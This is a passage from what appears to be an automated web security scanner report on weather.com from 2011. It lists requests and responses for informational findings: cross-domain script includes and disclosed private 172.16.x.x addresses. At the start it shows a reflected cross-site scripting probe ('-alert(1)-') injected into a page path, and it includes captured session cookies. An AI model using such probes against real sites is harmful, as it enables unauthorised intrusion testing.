GET /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Thu, 24 Mar 2011 17:40:12 GMT Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:40:41 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x04 X-Varnish: 2184711165 Connection: keep-alive Content-Length: 159890 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert(1)-"370523ec97/bc/favicon2.ico?"><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]...
5.8. http://www.weather.com/services/desktop.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/services/desktop.html
Issue detail
The response dynamically includes the following scripts from other domains:http://j.imwx.com/common/header/javascript/eventbroadcaster.js http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js
Request
GET /services/desktop.html HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:25 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x10 Expires: Thu, 24 Mar 2011 17:36:38 GMT Connection: keep-alive Content-Length: 96326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Free Desktop Weather and Alerts from The Weather Channel</title> <meta name="descr...[SNIP]... <!-- DFP --><script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"> </script><script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://j.imwx.com/common/header/javascript/eventbroadcaster.js"> </script>...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"> </script><script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"> </script>...[SNIP]...
5.9. http://www.weather.com/weather-apps/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather-apps/
Issue detail
The response dynamically includes the following scripts from other domains:http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
Request
GET /weather-apps/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987998310%7C1303579998310%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Thu, 24 Mar 2011 17:32:45 GMT Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:37:44 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x00 X-Cache-Hits: 1 X-Varnish: 1096856222 1096828614 Connection: keep-alive Content-Length: 135009 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>Weather App Index ... A listing of weather apps from weather.com</TITLE> <META name="Description"...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]...
5.10. http://www.weather.com/weather/health/beauty/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather/health/beauty/
Issue detail
The response dynamically includes the following scripts from other domains:http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js
Request
GET /weather/health/beauty/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Server: Apache Vary: Accept-Encoding SVRNAME: web2x11 Date: Thu, 24 Mar 2011 17:33:32 GMT Connection: keep-alive Content-Length: 116103 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="co...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"> </script><script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"> </script>...[SNIP]...
6. Private IP addresses disclosed
previous
next
There are 5 instances of this issue:
6.1. http://www.weather.com/activities/driving/rushhour/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/activities/driving/rushhour/
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:
Request
GET /activities/driving/rushhour/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:32:46 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web1x10 VarnishSet: web X-Varnish: 1455522174 Vary: Accept-Encoding Content-Length: 96659 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<...[SNIP]... <% /** var remoteAddr="172.16.24.21 "; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; ...[SNIP]... l ads test code /* if (adTest) { if ((remoteAddr.indexOf("10.") == 0)|| (remoteAddr.indexOf("169.254.") == 0)|| (remoteAddr.indexOf("192.168.") == 0)|| (remoteAddr.indexOf("172.16.24.25 ") == 0)) { OAS_host=adTest; } } */ OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);...[SNIP]...
6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/mobile/swap/send_sms_to_phone.html
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:
Request
GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:26 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x13 Expires: Thu, 24 Mar 2011 17:36:18 GMT Connection: keep-alive Content-Length: 34038 <HTML> <HEAD> <TITLE>Wireless Internet</title> <script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap...[SNIP]... <% /** var remoteAddr="172.16.24.21 "; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; ...[SNIP]... l ads test code /* if (adTest) { if ((remoteAddr.indexOf("10.") == 0)|| (remoteAddr.indexOf("169.254.") == 0)|| (remoteAddr.indexOf("192.168.") == 0)|| (remoteAddr.indexOf("172.16.24.25 ") == 0)) { OAS_host=adTest; } } */ OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);...[SNIP]...
6.3. http://www.weather.com/services/desktop.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/services/desktop.html
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:
Request
GET /services/desktop.html HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:25 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x10 Expires: Thu, 24 Mar 2011 17:36:38 GMT Connection: keep-alive Content-Length: 96326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Free Desktop Weather and Alerts from The Weather Channel</title> <meta name="descr...[SNIP]... <% /** var remoteAddr="172.16.24.23 "; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat='/v.20100727.0'; var bust_hpCSS='/v.20100304.2'; ...[SNIP]... l ads test code /* if (adTest) { if ((remoteAddr.indexOf("10.") == 0)|| (remoteAddr.indexOf("169.254.") == 0)|| (remoteAddr.indexOf("192.168.") == 0)|| (remoteAddr.indexOf("172.16.24.25 ") == 0)) { OAS_host=adTest; } } */ OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);...[SNIP]...
6.4. http://www.weather.com/weather/health/beauty/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather/health/beauty/
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:172.16.118.30 172.16.24.25
Request
GET /weather/health/beauty/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988043887%7C1303580043887%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Server: Apache Vary: Accept-Encoding SVRNAME: web3x02 Date: Thu, 24 Mar 2011 17:35:19 GMT Connection: keep-alive Content-Length: 116103 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="co...[SNIP]... <script type="text/javascript"> // Global Cache busting section var remoteAddr="172.16.118.30 "; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat = '/v.20100727.0'; var bust_globalNav='/v....[SNIP]... cial ads test code if (adTest) { if ((remoteAddr.indexOf("10.") == 0)|| (remoteAddr.indexOf("169.254.") == 0)|| (remoteAddr.indexOf("192.168.") == 0)|| (remoteAddr.indexOf("172.16.24.25 ") == 0)) { OAS_host=adTest; } } OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11); f...[SNIP]...
6.5. http://www.weather.com/weather/health/beauty/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather/health/beauty/
Issue detail
The following RFC 1918 IP addresses were disclosed in the response:172.16.183.25 172.16.24.25
Request
GET /weather/health/beauty/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B
Response
